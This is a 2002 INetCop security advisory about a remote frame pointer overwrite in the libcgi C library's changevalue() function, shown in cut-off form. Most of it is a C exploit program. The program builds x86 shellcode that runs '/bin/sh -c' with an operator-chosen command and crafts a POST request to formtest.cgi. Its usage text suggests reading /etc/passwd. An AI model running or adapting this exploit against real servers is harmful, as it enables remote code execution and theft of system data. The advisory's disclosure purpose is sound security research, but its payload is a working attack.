======================================== INetCop Security Advisory #2002-0x82-007 ======================================== * Title: Remote Frame Pointer Overwrite vulnerability in libCGI (LIB CGI in Language C). 0x01. Description A simple mode of develop CGI in language C. The libcgi package is a library written in pure C for C programmers or, programmers with some experience in language C that want development CGI in language C. This Project includes two libraries that has example practice to use of the same. (libcgi, lib-mysql) Vulnerability of problem happens in the 76 line of 'Include/libcgi.h'. Let's examine. :-) __ 69 void changevalue(char mt[],char *pt) 70 { 71 char buffer[256]={'\0'}; // 256 72 int size=(strlen(pt)); // pt size. 73 int x,y; 74 for(x=0,y=0;x ** ** LIB CGI in Language C - Testing "libcgi.h" with Url Encoding - ** by Marcos Luiz Onisto , bigadmin@uol.com.br ** ... ** 8282828282828282828282828282828282828282828282828282 ... ** ... ** ** Happy Exploit ! ** ** Linux testsub 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown ** uid=99(nobody) gid=99(nobody) groups=99(nobody) ** ** __ ** exploit by "you dong-h0un"(Xpl017Elz), . ** My World: http://x82.i21c.net & http://x82.inetcop.org ** */ #include #include #define Xpl017Elz x82 #define BUFSIZE 1024 #define DCOMM "printf \"\\n\\n\\nHappy Exploit !\\n\\n\";uname -a;id" void banrl(); int main(argc,argv) int argc; char *argv[]; { #define NOPSH 0xbffffc20 unsigned long nopsh=NOPSH; #define SHADR 0xbffffd60 unsigned long shadr=SHADR; int whtp; #define NULLS 0x00000000 int num_0,num_1,num_2,num_3; int num_4,num_5; char input_code[]= /* It's true ! */ "NAME=Xpl017Elz&EMAIL=szoahc@hotmail.com&HOME=http://x82.inetcop.org&SEL=Music&CHECK=yes&RADIO=very+happy&COMMENTS="; char send_code[]= "&Submit=Send\n"; /* send */ #define COMMS 235 char shc0mm[COMMS]=DCOMM; unsigned char x0x[BUFSIZE]; char x0x2[BUFSIZE]; int x0x_0_num=NULLS; int x0x_1_num=NULLS; num_5=num_4=num_3=num_2=num_1=num_0=NULLS; memset(x0x,0x00,BUFSIZE); memset(x0x2,0x00,BUFSIZE); while((whtp=getopt(argc,argv,"C:c:S:s:A:a:"))!=EOF) { switch(whtp) { case 'C': case 'c': if(strlen(optarg)>COMMS) { fprintf(stderr,"\n [-] String Error :-(\n\n"); exit(-1); } memset(shc0mm,0x00,COMMS); strncpy(shc0mm,optarg,COMMS); break; case 'S': case 's': nopsh=strtoul(optarg,NULL,0); break; case 'A': case 'a': shadr=strtoul(optarg,NULL,0); break; case '?': { (void)banrl(); fprintf(stderr,"\n Usage: %s -opt args\n",argv[0]); fprintf(stderr,"\n\t-s [addr] - shellcode"); fprintf(stderr,"\n\t-a [addr] - &shellcode"); fprintf(stderr,"\n\t-c [cmd] - command\n"); fprintf(stderr,"\n Example: %s -s %p -a %p -c 'cat /etc/passwd'\n\n",argv[0],nopsh,shadr); exit(0); } break; } } //--- make shellcode :-) ---// /* This is dong-h0un U style */ num_1=strlen(shc0mm)+0x0c; num_2=num_1+0x01; num_3=num_2+0x04; num_4=num_3+0x04; num_5=num_4+0x04; x0x[num_0++]=0xeb; x0x[num_0++]=0x30; x0x[num_0++]=0x5e; x0x[num_0++]=0x89; x0x[num_0++]=0x76; x0x[num_0++]=num_2; x0x[num_0++]=0x31; x0x[num_0++]=0xc0; x0x[num_0++]=0x88; x0x[num_0++]=0x46; x0x[num_0++]=0x08; x0x[num_0++]=0x88; x0x[num_0++]=0x46; x0x[num_0++]=0x0b; x0x[num_0++]=0x88; x0x[num_0++]=0x46; x0x[num_0++]=num_1;x0x[num_0++]=0x89; x0x[num_0++]=0x46; x0x[num_0++]=num_5;x0x[num_0++]=0xb0; x0x[num_0++]=0x0b; x0x[num_0++]=0x8d; x0x[num_0++]=0x5e; x0x[num_0++]=0x09; x0x[num_0++]=0x89; x0x[num_0++]=0x5e; x0x[num_0++]=num_3;x0x[num_0++]=0x8d; x0x[num_0++]=0x5e; x0x[num_0++]=0x0c; x0x[num_0++]=0x89; x0x[num_0++]=0x5e; x0x[num_0++]=num_4;x0x[num_0++]=0x89; x0x[num_0++]=0xf3; x0x[num_0++]=0x8d; x0x[num_0++]=0x4e; x0x[num_0++]=num_2; x0x[num_0++]=0x8d; x0x[num_0++]=0x56; x0x[num_0++]=num_5; x0x[num_0++]=0xcd; x0x[num_0++]=0x80; x0x[num_0++]=0x31; x0x[num_0++]=0xc0; x0x[num_0++]=0xb0; x0x[num_0++]=0x01; x0x[num_0++]=0xcd; x0x[num_0++]=0x80; x0x[num_0++]=0xe8; x0x[num_0++]=0xcb; x0x[num_0++]=0xff; x0x[num_0++]=0xff; x0x[num_0++]=0xff; x0x[num_0++]=0x2f; x0x[num_0++]=0x2f; x0x[num_0++]=0x62; x0x[num_0++]=0x69; x0x[num_0++]=0x6e; x0x[num_0++]=0x2f; x0x[num_0++]=0x73; x0x[num_0++]=0x68; x0x[num_0++]=0x20; x0x[num_0++]=0x2d; x0x[num_0++]=0x63; x0x[num_0++]=0x20; //--- execute formtest.cgi ---// fprintf(stdout,"POST /cgi-bin/formtest.cgi HTTP/1.0\n"); fprintf(stdout,"Connection: close\n"); fprintf(stdout,"User-Agent: "); //--- put shellcode ---// for(x0x_0_num=0;x0x_0_num